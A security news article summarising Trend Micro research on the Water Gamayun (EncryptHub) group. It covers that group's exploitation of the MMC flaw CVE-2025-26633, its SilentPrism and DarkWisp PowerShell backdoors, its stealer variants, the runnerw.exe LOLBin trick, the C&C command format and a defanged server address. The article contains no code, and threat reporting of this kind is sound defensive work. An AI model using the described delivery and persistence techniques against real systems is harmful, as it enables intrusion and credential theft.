The threat actors behind the zero-day exploitation of a recently-patched security vulnerability in Microsoft Windows have been found to deliver two new backdoors called SilentPrism and DarkWisp.
The activity has been attributed to a suspected Russian hacking group called Water Gamayun, which is also known as EncryptHub and LARVA-208.
“The threat actor deploys payloads primarily by means of malicious provisioning packages, signed .msi files, and Windows MSC files, using techniques like the IntelliJ runnerw.exe for command execution,” Trend Micro researchers Aliakbar Zahravi and Ahmed Mohamed Ibrahim said in a follow-up analysis published last week.
Water Gamayun has been linked to the active exploitation of CVE-2025-26633 (aka MSC EvilTwin), a vulnerability in the Microsoft Management Console (MMC) framework, to execute malware by means of a rogue Microsoft Console (.msc) file.
The attack chains involve the use of provisioning packages (.ppkg), signed Microsoft Windows Installer files (.msi), and .msc files to deliver information stealers and backdoors that are capable of persistence and data theft.
EncryptHub gained attention towards the end of June 2024, after having used a GitHub repository named “encrypthub” to push various kinds of malware families, including stealers, miners, and ransomware, via a fake WinRAR website. The threat actors have since transitioned to their infrastructure for both staging and command-and-control (C&C) purposes.
The .msi installers used in the attacks masquerade as legitimate messaging and meeting software such as DingTalk, QQTalk, and VooV Meeting. They are designed to execute a PowerShell downloader, which is then used to fetch and run the next-stage payload on a compromised host.
One such malware is a PowerShell implant dubbed SilentPrism that can set up persistence, execute multiple shell commands simultaneously, and maintain remote control, while also incorporating anti-analysis techniques to evade detection. Another PowerShell backdoor of note is DarkWisp, which enables system reconnaissance, exfiltration of sensitive data, and persistence.
“Once the malware exfiltrates reconnaissance and system information to the C&C server, it enters a continuous loop waiting for commands,” the researchers said. “The malware accepts commands through a TCP connection on port 8080, where commands arrive in the format COMMAND|<base64_encoded_command>.”
“The main communication loop ensures continuous interaction with the server, handling commands, maintaining connectivity, and securely transmitting results.”
The third payload dropped in the attacks is the MSC EvilTwin loader that weaponizes CVE-2025-26633 to execute a malicious .msc file, ultimately leading to the deployment of the Rhadamanthys Stealer. The loader is also designed to perform a cleanup of the system to avoid leaving a forensic trail.
Rhadamanthys is far from the only stealer in Water Gamayun’s arsenal, for it has been observed delivering another commodity stealer called StealC, as well as three custom PowerShell variants referred to as EncryptHub Stealer variant A, variant B, and variant C.
The bespoke stealer is fully-featured malware that can collect extensive system information, including details about antivirus software, installed software, network adapters, and running applications. It also extracts Wi-Fi passwords, Windows product keys, clipboard history, browser credentials, and session data from various apps related to messaging, VPN, FTP, and password management.
Furthermore, it specifically singles out files matching certain keywords and extensions, indicating a focus on gathering recovery phrases associated with cryptocurrency wallets.
“These variants exhibit similar functionalities and capabilities, with only minor modifications distinguishing them,” the researchers noted. “All EncryptHub variants covered in this research are modified versions of the open-source Kematian Stealer.”
One iteration of EncryptHub Stealer is noteworthy for the use of a new living-off-the-land binary (LOLBin) technique in which the IntelliJ process launcher “runnerw.exe” is used to proxy the execution of a remote PowerShell script on an infected system.
The stealer artifacts, distributed through malicious MSI packages or binary malware droppers, have also been found to propagate other malware families like Lumma Stealer, Amadey, and clippers.
Further analysis of the threat actor’s C&C infrastructure (“82.115.223[.]182”) has revealed the use of other PowerShell scripts to download and execute AnyDesk software for remote access and the ability of the operators to send Base64-encoded remote commands to the victim machine.
“Water Gamayun’s use of various delivery methods and techniques in its campaign, such as provisioning malicious payloads through signed Microsoft Installer files and leveraging LOLBins, highlights their adaptability in compromising victims’ systems and data,” Trend Micro said.
“Their intricately designed payloads and C&C infrastructure enable the threat actor to maintain persistence, dynamically control infected systems, and obfuscate their activities.”
